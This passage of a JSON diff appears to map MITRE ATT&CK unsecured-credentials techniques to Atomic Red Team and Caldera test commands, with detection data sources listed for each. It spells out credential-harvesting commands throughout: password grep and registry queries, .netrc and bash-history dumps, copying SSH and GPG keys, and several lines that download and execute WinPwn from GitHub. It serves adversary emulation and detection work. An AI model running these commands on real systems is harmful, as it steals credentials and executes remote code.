logon sessions being created or terminated by accounts (Local, Domain, or Cloud), interactively or over the network, in order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session creation", + "description": "A logon session for a user was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "logon session" + }, + { + "data_source": "logon session", + "definition": "Information about logon sessions being created or terminated by accounts (Local, Domain, or Cloud), interactively or over the network, in order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session creation", + "description": "A logon session for a user was created.", + "source_data_element": "user", + "relationship": "created logon session from", + "target_data_element": "ip" + }, + { + "data_source": "logon session", + "definition": "Information about logon sessions being created or terminated by accounts (Local, Domain, or Cloud), interactively or over the network, in order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session creation", + "description": "A logon session for a user was created.", + "source_data_element": "user", + "relationship": "created logon session from", + "target_data_element": "port" + }, + { + "data_source": "active directory", + "definition": "Information associated with the Active Directory service or objects (Such as a user, a group, or a workstation) and activity around them.", + "collection_layers": [ + "host", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Azure AD" + ], + "data_component": "active directory credential request", + "description": "A user requested active directory credentials, such as a ticket or token.", + "source_data_element": "user", + "relationship": "requested", + "target_data_element": "ad credential" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/security-principals" + ], + [ + "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/basic-audit-logon-events" + ], + [ + "https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/ad-ds-getting-started" + ] + ] + }, + { + "technique_id": "T1552.001", + "command_list": [ + "python2 laZagne.py all\n", + "grep -ri password /\n", + "findstr /si pass *.xml *.doc *.txt *.xls\nls -R | select-string -Pattern password\n", + "type C:\\Windows\\Panther\\unattend.xml\ntype C:\\Windows\\Panther\\Unattend\\unattend.xml\n", + "for file in $(find / -name .netrc 2> /dev/null);do echo $file ; cat $file ; done \n", + "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nsensitivefiles -noninteractive -consoleoutput", + "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nSnaffler -noninteractive -consoleoutput", + "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\npowershellsensitive -consoleoutput -noninteractive", + "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\npasshunt -local $true -noninteractive", + "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nsessionGopher -noninteractive -consoleoutput", + "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nSharpCloud -consoleoutput -noninteractive " + ], + "commands": [ + { + "command": "python2 laZagne.py all\n", + "source": "atomics/T1552.001/T1552.001.yaml", + "name": "Atomic Red Team Test - Unsecured Credentials: Credentials In Files" + }, + { + "command": "grep -ri password /\n", + "source": "atomics/T1552.001/T1552.001.yaml", + "name": "Atomic Red Team Test - Unsecured Credentials: Credentials In Files" + }, + { + "command": "findstr /si pass *.xml *.doc *.txt *.xls\nls -R | select-string -Pattern password\n", + "source": "atomics/T1552.001/T1552.001.yaml", + "name": "Atomic Red Team Test - Unsecured Credentials: Credentials In Files" + }, + { + "command": "type C:\\Windows\\Panther\\unattend.xml\ntype C:\\Windows\\Panther\\Unattend\\unattend.xml\n", + "source": "atomics/T1552.001/T1552.001.yaml", + "name": "Atomic Red Team Test - Unsecured Credentials: Credentials In Files" + }, + { + "command": "for file in $(find / -name .netrc 2> /dev/null);do echo $file ; cat $file ; done \n", + "source": "atomics/T1552.001/T1552.001.yaml", + "name": "Atomic Red Team Test - Unsecured Credentials: Credentials In Files" + }, + { + "command": "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nsensitivefiles -noninteractive -consoleoutput", + "source": "atomics/T1552.001/T1552.001.yaml", + "name": "Atomic Red Team Test - Unsecured Credentials: Credentials In Files" + }, + { + "command": "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nSnaffler -noninteractive -consoleoutput", + "source": "atomics/T1552.001/T1552.001.yaml", + "name": "Atomic Red Team Test - Unsecured Credentials: Credentials In Files" + }, + { + "command": "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\npowershellsensitive -consoleoutput -noninteractive", + "source": "atomics/T1552.001/T1552.001.yaml", + "name": "Atomic Red Team Test - Unsecured Credentials: Credentials In Files" + }, + { + "command": "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\npasshunt -local $true -noninteractive", + "source": "atomics/T1552.001/T1552.001.yaml", + "name": "Atomic Red Team Test - Unsecured Credentials: Credentials In Files" + }, + { + "command": "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nsessionGopher -noninteractive -consoleoutput", + "source": "atomics/T1552.001/T1552.001.yaml", + "name": "Atomic Red Team Test - Unsecured Credentials: Credentials In Files" + }, + { + "command": "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nSharpCloud -consoleoutput -noninteractive ", + "source": "atomics/T1552.001/T1552.001.yaml", + "name": "Atomic Red Team Test - Unsecured Credentials: Credentials In Files" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1552.001", + "display_name": "Unsecured Credentials: Credentials In Files", + "atomic_tests": [ + { + "name": "Extract Browser and System credentials with LaZagne", + "auto_generated_guid": "9e507bb8-1d30-4e3b-a49b-cb5727d7ea79", + "description": "[LaZagne Source](https://github.com/AlessandroZ/LaZagne)\n", + "supported_platforms": [ + "macos" + ], + "executor": { + "command": "python2 laZagne.py all\n", + "elevation_required": true, + "name": "bash" + } + }, + { + "name": "Extract passwords with grep", + "auto_generated_guid": "bd4cf0d1-7646-474e-8610-78ccf5a097c4", + "description": "Extracting credentials from files\n", + "supported_platforms": [ + "macos", + "linux" + ], + "input_arguments": { + "file_path": { + "description": "Path to search", + "type": "String", + "default": "/" + } + }, + "executor": { + "command": "grep -ri password #{file_path}\n", + "name": "sh" + } + }, + { + "name": "Extracting passwords with findstr", + "auto_generated_guid": "0e56bf29-ff49-4ea5-9af4-3b81283fd513", + "description": "Extracting Credentials from Files. Upon execution, the contents of files that contain the word \"password\" will be displayed.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "findstr /si pass *.xml *.doc *.txt *.xls\nls -R | select-string -Pattern password\n", + "name": "powershell" + } + }, + { + "name": "Access unattend.xml", + "auto_generated_guid": "367d4004-5fc0-446d-823f-960c74ae52c3", + "description": "Attempts to access unattend.xml, where credentials are commonly stored, within the Panther directory where installation logs are stored.\nIf these files exist, their contents will be displayed. They are used to store credentials/answers during the unattended windows install process.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "type C:\\Windows\\Panther\\unattend.xml\ntype C:\\Windows\\Panther\\Unattend\\unattend.xml\n", + "name": "command_prompt", + "elevation_required": true + } + }, + { + "name": "Find and Access Github Credentials", + "auto_generated_guid": "da4f751a-020b-40d7-b9ff-d433b7799803", + "description": "This test looks for .netrc files (which stores github credentials in clear text )and dumps its contents if found.\n", + "supported_platforms": [ + "macos", + "linux" + ], + "executor": { + "name": "bash", + "elevation_required": false, + "command": "for file in $(find / -name .netrc 2> /dev/null);do echo $file ; cat $file ; done \n" + } + }, + { + "name": "WinPwn - sensitivefiles", + "auto_generated_guid": "114dd4e3-8d1c-4ea7-bb8d-8d8f6aca21f0", + "description": "Search for sensitive files on this local system using the SensitiveFiles function of WinPwn", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nsensitivefiles -noninteractive -consoleoutput", + "name": "powershell" + } + }, + { + "name": "WinPwn - Snaffler", + "auto_generated_guid": "fdd0c913-714b-4c13-b40f-1824d6c015f2", + "description": "Check Domain Network-Shares for cleartext passwords using Snaffler function of WinPwn", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nSnaffler -noninteractive -consoleoutput", + "name": "powershell" + } + }, + { + "name": "WinPwn - powershellsensitive", + "auto_generated_guid": "75f66e03-37d3-4704-9520-3210efbe33ce", + "description": "Check Powershell event logs for credentials or other sensitive information via winpwn powershellsensitive function.", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\npowershellsensitive -consoleoutput -noninteractive", + "name": "powershell" + } + }, + { + "name": "WinPwn - passhunt", + "auto_generated_guid": "00e3e3c7-6c3c-455e-bd4b-461c7f0e7797", + "description": "Search for Passwords on this system using passhunt via WinPwn", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\npasshunt -local $true -noninteractive", + "cleanup_command": "rm -force .\\passhunt.exe -ErrorAction Ignore\nrm -force .\\phunter* -ErrorAction Ignore\nrm -force -recurse .\\DomainRecon -ErrorAction Ignore\nrm -force -recurse .\\Exploitation -ErrorAction Ignore\nrm -force -recurse .\\LocalPrivEsc -ErrorAction Ignore\nrm -force -recurse .\\LocalRecon -ErrorAction Ignore\nrm -force -recurse .\\Vulnerabilities -ErrorAction Ignore", + "name": "powershell" + } + }, + { + "name": "WinPwn - SessionGopher", + "auto_generated_guid": "c9dc9de3-f961-4284-bd2d-f959c9f9fda5", + "description": "Launches SessionGopher on this system via WinPwn", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nsessionGopher -noninteractive -consoleoutput", + "name": "powershell" + } + }, + { + "name": "WinPwn - Loot local Credentials - AWS, Microsoft Azure, and Google Compute credentials", + "auto_generated_guid": "aaa87b0e-5232-4649-ae5c-f1724a4b2798", + "description": "Loot local Credentials - AWS, Microsoft Azure, and Google Compute credentials technique via function of WinPwn", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nSharpCloud -consoleoutput -noninteractive ", + "name": "powershell" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "user", + "relationship": "accessed", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "process", + "relationship": "accessed", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "user", + "relationship": "requested access to", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "process", + "relationship": "requested access to", + "target_data_element": "file" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ] + ] + }, + { + "technique_id": "T1552.002", + "command_list": [ + "reg query HKLM /f password /t REG_SZ /s\nreg query HKCU /f password /t REG_SZ /s\n", + "reg query HKCU\\Software\\SimonTatham\\PuTTY\\Sessions /t REG_SZ /s\n", + "reg query HKCU /f password /t REG_SZ /s\n", + "reg query HKLM /f password /t REG_SZ /s\n" + ], + "commands": [ + { + "command": "reg query HKLM /f password /t REG_SZ /s\nreg query HKCU /f password /t REG_SZ /s\n", + "source": "atomics/T1552.002/T1552.002.yaml", + "name": "Atomic Red Team Test - Unsecured Credentials: Credentials in Registry" + }, + { + "command": "reg query HKCU\\Software\\SimonTatham\\PuTTY\\Sessions /t REG_SZ /s\n", + "source": "atomics/T1552.002/T1552.002.yaml", + "name": "Atomic Red Team Test - Unsecured Credentials: Credentials in Registry" + }, + { + "command": "reg query HKCU /f password /t REG_SZ /s\n", + "source": "data/abilities/credential-access/3aad5312-d48b-4206-9de4-39866c12e60f.yml", + "name": "Search for possible credentials stored in Registry" + }, + { + "command": "reg query HKLM /f password /t REG_SZ /s\n", + "source": "data/abilities/credential-access/98e58fc4-3843-4511-89b1-50cb872e0c9b.yml", + "name": "Search for possible credentials stored in the HKLM Hive" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1552.002", + "display_name": "Unsecured Credentials: Credentials in Registry", + "atomic_tests": [ + { + "name": "Enumeration for Credentials in Registry", + "auto_generated_guid": "b6ec082c-7384-46b3-a111-9a9b8b14e5e7", + "description": "Queries to enumerate for credentials in the Registry. Upon execution, any registry key containing the word \"password\" will be displayed.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "reg query HKLM /f password /t REG_SZ /s\nreg query HKCU /f password /t REG_SZ /s\n", + "name": "command_prompt" + } + }, + { + "name": "Enumeration for PuTTY Credentials in Registry", + "auto_generated_guid": "af197fd7-e868-448e-9bd5-05d1bcd9d9e5", + "description": "Queries to enumerate for PuTTY credentials in the Registry. PuTTY must be installed for this test to work. If any registry\nentries are found, they will be displayed.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "reg query HKCU\\Software\\SimonTatham\\PuTTY\\Sessions /t REG_SZ /s\n", + "name": "command_prompt" + } + } + ] + }, + { + "id": "3aad5312-d48b-4206-9de4-39866c12e60f", + "name": "Credentials in Registry - HKCU", + "description": "Search for possible credentials stored in Registry", + "tactic": "credential-access", + "technique": { + "attack_id": "T1552.002", + "name": "Unsecured Credentials: Credentials in Registry" + }, + "platforms": { + "windows": { + "psh": { + "command": "reg query HKCU /f password /t REG_SZ /s\n" + } + } + } + }, + { + "id": "98e58fc4-3843-4511-89b1-50cb872e0c9b", + "name": "Credentials in Registry - HKLM", + "description": "Search for possible credentials stored in the HKLM Hive", + "tactic": "credential-access", + "technique": { + "attack_id": "T1552.002", + "name": "Unsecured Credentials: Credentials in Registry" + }, + "platforms": { + "windows": { + "psh": { + "command": "reg query HKLM /f password /t REG_SZ /s\n" + } + } + } + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key access", + "description": "A registry key was accessed.", + "source_data_element": "process", + "relationship": "accessed", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key access", + "description": "A registry key was accessed.", + "source_data_element": "user", + "relationship": "accessed", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key access", + "description": "A registry key was accessed.", + "source_data_element": "process", + "relationship": "requested access to", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key access", + "description": "A registry key was accessed.", + "source_data_element": "user", + "relationship": "requested access to", + "target_data_element": "windows registry key" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/sysinfo/registry" + ] + ] + }, + { + "technique_id": "T1552.003", + "command_list": [ + "cat #{bash_history_filename} | grep #{bash_history_grep_args} > ~/loot.txt\n", + "cat #{bash_history_filename} | grep -e '-p ' -e 'pass' -e 'ssh' > #{output_file}\n", + "cat ~/.bash_history | grep #{bash_history_grep_args} > #{output_file}\n", + "find ~/.bash_sessions -name '*' -exec cat {} \\; 2>/dev/null", + "cat ~/.bash_history" + ], + "commands": [ + { + "command": "cat #{bash_history_filename} | grep #{bash_history_grep_args} > ~/loot.txt\n", + "source": "atomics/T1552.003/T1552.003.yaml", + "name": "Atomic Red Team Test - Unsecured Credentials: Bash History" + }, + { + "command": "cat #{bash_history_filename} | grep -e '-p ' -e 'pass' -e 'ssh' > #{output_file}\n", + "source": "atomics/T1552.003/T1552.003.yaml", + "name": "Atomic Red Team Test - Unsecured Credentials: Bash History" + }, + { + "command": "cat ~/.bash_history | grep #{bash_history_grep_args} > #{output_file}\n", + "source": "atomics/T1552.003/T1552.003.yaml", + "name": "Atomic Red Team Test - Unsecured Credentials: Bash History" + }, + { + "command": "find ~/.bash_sessions -name '*' -exec cat {} \\; 2>/dev/null", + "source": "data/abilities/credential-access/422526ec-27e9-429a-995b-c686a29561a4.yml", + "name": "Get contents of bash history" + }, + { + "command": "cat ~/.bash_history", + "source": "data/abilities/credential-access/422526ec-27e9-429a-995b-c686a29561a4.yml", + "name": "Get contents of bash history" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1552.003", + "display_name": "Unsecured Credentials: Bash History", + "atomic_tests": [ + { + "name": "Search Through Bash History", + "auto_generated_guid": "3cfde62b-7c33-4b26-a61e-755d6131c8ce", + "description": "Search through bash history for specifice commands we want to capture\n", + "supported_platforms": [ + "linux", + "macos" + ], + "input_arguments": { + "output_file": { + "description": "Path where captured results will be placed", + "type": "Path", + "default": "~/loot.txt" + }, + "bash_history_grep_args": { + "description": "grep arguments that filter out specific commands we want to capture", + "type": "Path", + "default": "-e '-p ' -e 'pass' -e 'ssh'" + }, + "bash_history_filename": { + "description": "Path of the bash history file to capture", + "type": "Path", + "default": "~/.bash_history" + } + }, + "executor": { + "command": "cat #{bash_history_filename} | grep #{bash_history_grep_args} > #{output_file}\n", + "name": "sh" + } + } + ] + }, + { + "id": "422526ec-27e9-429a-995b-c686a29561a4", + "name": "Dump history", + "description": "Get contents of bash history", + "tactic": "credential-access", + "technique": { + "attack_id": "T1552.003", + "name": "Unsecured Credentials: Bash History" + }, + "platforms": { + "darwin": { + "sh": { + "command": "find ~/.bash_sessions -name '*' -exec cat {} \\; 2>/dev/null", + "parsers": { + "plugins.stockpile.app.parsers.ssh": [ + { + "source": "remote.ssh.cmd" + } + ] + } + } + }, + "linux": { + "sh": { + "command": "cat ~/.bash_history", + "parsers": { + "plugins.stockpile.app.parsers.ssh": [ + { + "source": "remote.ssh.cmd" + } + ] + } + } + } + } + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "user", + "relationship": "accessed", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "process", + "relationship": "accessed", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "user", + "relationship": "requested access to", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "process", + "relationship": "requested access to", + "target_data_element": "file" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ] + ] + }, + { + "technique_id": "T1552.004", + "command_list": [ + "dir c:\\ /b /s .key | findstr /e .key\n", + "find / -name id_rsa >> #{output_file}\n", + "find #{search_path} -name id_rsa >> /tmp/keyfile_locations.txt\n", + "mkdir #{output_folder}\nfind / -name id_rsa -exec cp --parents {} #{output_folder} \\;\n", + "mkdir /tmp/art-staging\nfind #{search_path} -name id_rsa -exec cp --parents {} /tmp/art-staging \\;\n", + "mkdir #{output_folder}\nfind / -name id_rsa -exec rsync -R {} #{output_folder} \\;\n", + "mkdir /tmp/art-staging\nfind #{search_path} -name id_rsa -exec rsync -R {} /tmp/art-staging \\;\n", + "mkdir #{output_folder}\nfind / -type d -name '.gnupg' -exec rsync -Rr {} #{output_folder} \\;\n", + "mkdir /tmp/GnuPG\nfind #{search_path} -type d -name '.gnupg' -exec rsync -Rr {} /tmp/GnuPG \\;\n", + "Import-Module AADInternals -Force\nExport-AADIntADFSCertificates\nGet-ChildItem | Where-Object {$_ -like \"ADFS*\"}\nWrite-Host \"`nCertificates retrieved successfully\"\n", + "Import-Module ActiveDirectory -Force \nImport-Module AADInternals -Force | Out-Null\n#Get Configuration\n$dcServerName = 